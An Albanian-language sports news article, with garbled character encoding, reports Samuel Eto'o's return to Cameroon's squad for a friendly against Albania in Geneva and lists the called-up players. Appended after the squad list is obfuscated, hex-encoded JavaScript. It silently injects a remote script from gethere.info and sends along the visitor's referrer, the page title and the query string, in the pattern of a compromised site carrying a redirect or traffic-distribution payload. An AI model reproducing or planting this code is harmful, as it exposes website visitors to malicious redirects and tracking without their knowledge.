largea_eto_o11351793019

Etoa��o luan kundA�r ShqipA�risA�

Ikona e futbollit kamerunas, Samuel Etoa��o i ka lA�nA� anash inatet me drejtuesit e FederatA�s sA� Futbollit tA� Kamerunit, pA�r A�ka kishte munguar njA� kohA� tA� gjatA� nA� pA�rfaqA�suesen e kA�tij vendi afrikan.

Ai ka pranuar ta��i bashkohet Kamerunit nA� ndeshjen e 14 nA�ntorit, nA� miqA�soren qA� do ta zhvillojnA� me kombA�taren shqiptare. Ish sulmuesi i PSG-sA�, Real Madridit, BarcelonA�s, Interit dhe a�?shtyllaa�? kryesore e Anzhit rus, nuk ishte pajtuar me politikA�n e federatA�s, dhe mbetjes borxh tA� pagave dhe shpA�rblimeve.

Por tani Etoa��o figuron midis tA� grumbulluarve pA�r tA� sfiduar pA�rfaqA�suesen shqiptare nA� miqA�soren qA� do tA� zhvillohet nA� GjenevA� tA� ZvicA�r. PA�rzgjedhA�si Jean-Paul Akono, kA�tA� herA� ka lA�nA� jashtA� pA�rbA�rjes disa nga veteranA�t e kA�saj pA�rfaqA�suese si portierin veteran Idriss Kameni, mbrojtA�sin Stephane Mbia dhe sulmuesin Idrissou Mohammadu.

TA� ftuarit nA� ekipin e Kamerunit pA�rballA� ShqipA�risA�:

PortierA�:A�Mayebi (Wrexham, Angli), Assembe (Nancy, FrancA�)

MbrojtA�s:A�Angbwa (Rostov, Rusi), Bedimo (Montpellier, FrancA�), Bong (Valenciennes, FrancA�), Kana-Biyik (Rennes, FrancA�), Nkoulou (Marseille, FrancA�), Nounkeu (Galatasaray, Turqi), Nyom (Granada, SpanjA�)

MesfushorA�:A�Emana (Al-Hilal, Arabia Saudite), Makoun (Rennes, FrancA�), Matip (Schalke 04, Gjermani), Mevoungou (Admira, Austri), Ngomo (Constantine, Algjeri), Song (Barcelona, SpanjA�), Songo’o (Portland, SHBA)

Sulmues:A�Aboubakar (Valenciennes, FrancA�), Adongcho (pa ekip), Babanda (Union Douala, Kamerun), Boya (Randers, DanimarkA�), Eto’o (Anzhi, Rusi), Olinga (Malaga, SpanjA�), Webo (Buyuksehir, Turqi), Yontcha (Olhanense, Portugali)var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}